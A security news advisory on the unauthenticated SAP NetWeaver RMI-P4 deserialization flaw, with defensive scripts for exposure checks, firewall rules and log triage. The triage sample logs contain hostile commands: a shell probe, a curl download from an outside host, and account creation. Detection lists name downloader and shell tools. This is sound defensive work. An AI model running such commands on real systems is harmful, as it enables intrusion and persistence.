A new critical bug has been discovered in SAP NetWeaver AS Java, identified as CVE-2025-42944. This flaw exists in a component called RMI-P4, which handles remote method calls. The issue is insecure deserialization: the service reconstructs Java objects from data it receives without verifying that the data is trustworthy, so attacker-supplied input can drive code execution on the server. Attackers can exploit this flaw to send malicious code that the server unknowingly runs.

The most concerning part is that this attack needs no login or password. Anyone with network access to the vulnerable service can exploit it. The attacker doesn’t need to authenticate or be inside the network. Once the bug is triggered successfully, the attacker can run any command on the underlying operating system, giving them full control over the affected server.

SAP has rated this issue as “HotNews,” its highest alert category, and assigned it the maximum CVSS severity score of 10.0. The company included the fix for this vulnerability in its October 2025 Security Patch Day release. The update provides patches and configuration changes to secure the RMI-P4 service and block unauthorized access.

This vulnerability is particularly dangerous for companies whose SAP NetWeaver servers are connected to the internet. If the RMI-P4 port is exposed publicly, attackers can reach it directly and exploit the flaw remotely. Even internal systems could be targeted if malware or insider threats have network access to the service. It is important to remember that the issue can spread fast once a single exposed system is compromised.

Security experts have warned that organizations must act quickly. The first step is to apply SAP’s official patches immediately. Delaying the update leaves servers open to full compromise. Until patching is completed, administrators should block or restrict external access to the RMI-P4 port using firewalls or network filters to reduce exposure.
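The two interim measures above, checking whether the P4 listener is reachable from outside and restricting it at the firewall, can be scripted. The following is an added example, not code from the article or from SAP: it parses `ss -ltnp` output to find P4 sockets bound to a non-loopback address, and renders an nftables allow-list for the port. The P4 port numbers (5NN04, and 5NN06 for P4 over SSL, where NN is the instance number) are the usual SAP convention and an assumption here, as is the constructed `ss` sample; the article itself does not state the port.

```python
"""Exposure check for the SAP AS Java P4 listener plus an nftables
allow-list generator.  Assumptions (not taken from the advisory): the P4
ports follow the SAP convention 5NN04 / 5NN06 (50004 / 50006 for instance
number 00); the `ss -ltnp` output below is constructed for illustration."""
import ipaddress
import re

# Constructed sample of `ss -ltnp` output: the P4 listener is bound to all
# IPv4 interfaces (exposed), the P4-SSL listener to all IPv6 interfaces,
# while HTTP is bound to an internal address and telnet to loopback.
SAMPLE_SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:50004       0.0.0.0:*         users:(("jstart",pid=4242,fd=77))
LISTEN 0      128    10.10.5.20:50000    0.0.0.0:*         users:(("jstart",pid=4242,fd=60))
LISTEN 0      128    [::]:50006          [::]:*            users:(("jstart",pid=4242,fd=79))
LISTEN 0      128    127.0.0.1:50008     0.0.0.0:*         users:(("jstart",pid=4242,fd=81))
"""


def p4_ports(instance_number: int) -> set[int]:
    """SAP port convention (assumption): P4 on 5NN04, P4 over SSL on 5NN06."""
    base = 50000 + instance_number * 100
    return {base + 4, base + 6}


# Matches the "Local Address:Port" column for IPv4 ("0.0.0.0:50004")
# and bracketed IPv6 ("[::]:50006") forms.
_ADDR_RE = re.compile(r"^(?:\[(?P<v6>[^\]]+)\]|(?P<v4>[^:]+)):(?P<port>\d+)$")


def exposed_listeners(ss_output: str, ports: set[int]) -> list[dict]:
    """Return LISTEN sockets on `ports` whose bind address is not loopback.
    A wildcard bind (0.0.0.0 or ::) is reachable on every interface and is
    reported with wildcard=True."""
    findings = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue  # header line or non-listening socket
        m = _ADDR_RE.match(fields[3])
        if not m:
            continue
        port = int(m.group("port"))
        if port not in ports:
            continue
        addr = ipaddress.ip_address(m.group("v6") or m.group("v4"))
        if addr.is_loopback:
            continue
        findings.append({
            "port": port,
            "bind": str(addr),
            "wildcard": addr.is_unspecified,
            "process": fields[5] if len(fields) > 5 else "",
        })
    return findings


def nft_allowlist(ports: set[int], allowed_cidrs: list[str]) -> str:
    """Render an nftables ruleset that accepts the P4 ports only from
    `allowed_cidrs` (e.g. the admin jump host or application-server subnet)
    and drops every other source.  Returned as text for review before
    loading with `nft -f`."""
    networks = [ipaddress.ip_network(c) for c in allowed_cidrs]  # raises on bad CIDR
    port_set = ", ".join(str(p) for p in sorted(ports))
    lines = [
        "table inet sap_p4 {",
        "  chain input {",
        "    type filter hook input priority 0; policy accept;",
        "    ct state established,related accept",
    ]
    for net in networks:
        fam = "ip6" if net.version == 6 else "ip"
        lines.append(f"    {fam} saddr {net} tcp dport {{ {port_set} }} accept")
    lines.append(f"    tcp dport {{ {port_set} }} drop")  # everything else
    lines += ["  }", "}"]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    ports = p4_ports(0)
    for f in exposed_listeners(SAMPLE_SS_OUTPUT, ports):
        print(f"EXPOSED port {f['port']} bound to {f['bind']} ({f['process']})")
    print(nft_allowlist(ports, ["10.10.0.0/16"]))
```

The ruleset keeps the chain's default policy as accept so that it only touches the P4 ports; on a host that already runs a restrictive firewall, merge the two rules into the existing input chain instead of adding a second table.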

Teams should also review server activity for any suspicious behavior. This includes looking for unusual code execution, new files or users being created, or abnormal Java processes. Monitoring tools and security logs should be checked regularly. If possible, affected systems should be isolated from the wider network to prevent potential spread or data theft.
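To make the review of "unusual code execution, new users, abnormal Java processes" concrete, here is an added example (not from the article, SAP, or any product) that triages process-creation events for the patterns worth escalating on an AS Java host: a shell or interpreter spawned by the Java server process, a download tool spawned by it, and an account-management command anywhere in its process tree. The key=value log format, the `jstart` process name for AS Java, the `sapadm` service user and all event contents are constructed assumptions for illustration; real deployments would feed auditd, Sysmon or EDR process events into the same logic.

```python
"""Triage of process-creation events for post-exploitation signs on a SAP
AS Java host.  Assumptions not taken from the advisory: AS Java runs as the
`jstart` process, the service user is `sapadm` (placeholder), and the log
lines use a constructed key=value format, not any real product's format."""
import shlex
from dataclasses import dataclass

# Constructed sample events.  Lines 2-4 model a compromised Java process
# spawning a shell and a downloader, and the shell creating an account; the
# last line is a benign cron-started shell that must NOT be flagged.
SAMPLE_EVENTS = """\
ts=2025-10-14T09:12:01Z user=sapadm pid=4242 ppid=1 parent=sapstart comm=jstart argv="jstart pf=/usr/sap/PLACEHOLDER/profile"
ts=2025-10-14T09:12:05Z user=sapadm pid=5101 ppid=4242 parent=jstart comm=sh argv="sh -c id"
ts=2025-10-14T09:12:09Z user=sapadm pid=5102 ppid=4242 parent=jstart comm=curl argv="curl -o /tmp/x http://203.0.113.10/x"
ts=2025-10-14T09:12:11Z user=root pid=5103 ppid=5101 parent=sh comm=useradd argv="useradd -m svc_backup"
ts=2025-10-14T09:13:00Z user=sapadm pid=5104 ppid=4242 parent=jstart comm=sapcontrol argv="sapcontrol -nr 00 -function GetProcessList"
ts=2025-10-14T09:15:00Z user=root pid=5105 ppid=900 parent=cron comm=sh argv="sh /etc/cron.daily/logrotate"
"""

JAVA_PARENTS = {"jstart", "java", "javaw.exe"}
SHELL_LIKE = {"sh", "bash", "dash", "ksh", "zsh", "cmd.exe", "powershell.exe",
              "pwsh", "python", "python3", "perl"}
DOWNLOADERS = {"curl", "wget", "certutil.exe", "bitsadmin.exe"}
ACCOUNT_TOOLS = {"useradd", "adduser", "usermod", "net.exe", "net1.exe"}


@dataclass
class Finding:
    rule: str
    pid: int
    comm: str
    argv: str
    descends_from_java: bool


def parse_events(text: str) -> list[dict]:
    """Parse key=value lines; shlex keeps the quoted argv as one token."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        kv = dict(tok.partition("=")[::2] for tok in shlex.split(line))
        kv["pid"], kv["ppid"] = int(kv["pid"]), int(kv["ppid"])
        events.append(kv)
    return events


def descends_from(by_pid: dict, pid: int, names: set[str], max_depth: int = 32) -> bool:
    """Walk ppid links inside the log; True if any ancestor's comm is in names.
    When the parent is not in the log, fall back to the recorded parent name."""
    ev = by_pid.get(pid)
    depth = 0
    while ev is not None and depth < max_depth:
        parent = by_pid.get(ev["ppid"])
        if parent is None:
            return ev["parent"] in names
        if parent["comm"] in names:
            return True
        ev = parent
        depth += 1
    return False


def triage(text: str) -> list[Finding]:
    """Apply the three rules.  Shells and downloaders are only reported when
    they descend from the AS Java process (a shell under cron is normal);
    account tools are always reported, annotated with their Java ancestry."""
    events = parse_events(text)
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if e["comm"] in SHELL_LIKE:
            rule = "shell_spawned"
        elif e["comm"] in DOWNLOADERS:
            rule = "downloader_spawned"
        elif e["comm"] in ACCOUNT_TOOLS:
            rule = "account_tool_run"
        else:
            continue
        from_java = descends_from(by_pid, e["pid"], JAVA_PARENTS)
        if rule != "account_tool_run" and not from_java:
            continue
        findings.append(Finding(rule, e["pid"], e["comm"], e["argv"], from_java))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        tag = "from AS Java" if f.descends_from_java else "unrelated tree"
        print(f"{f.rule:<20} pid={f.pid} {f.comm} [{tag}]: {f.argv}")
```

The ancestry walk matters more than the command lists: `sapcontrol` under `jstart` is routine and produces nothing, while the same `useradd` is far more significant when its parent chain leads back to the Java server than when it comes from an administrator's interactive session.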

Experts have emphasized that this is not a theoretical threat; it is a real and serious one. Attackers are known to scan for SAP servers exposed online, and similar vulnerabilities in the past were quickly used to install backdoors and steal information. Because this flaw requires no login, it drastically lowers the barrier for exploitation.

In short, CVE-2025-42944 is a severe, unauthenticated remote code execution bug that allows attackers to take over SAP NetWeaver servers completely. Organizations running SAP NetWeaver AS Java must patch immediately, block the vulnerable service if patching isn’t possible, and closely monitor for signs of compromise. Acting fast could be the difference between prevention and a full system breach.

Stay alert, and keep your security measures updated!

Source: Follow cybersecurity88 on X and LinkedIn for the latest cybersecurity news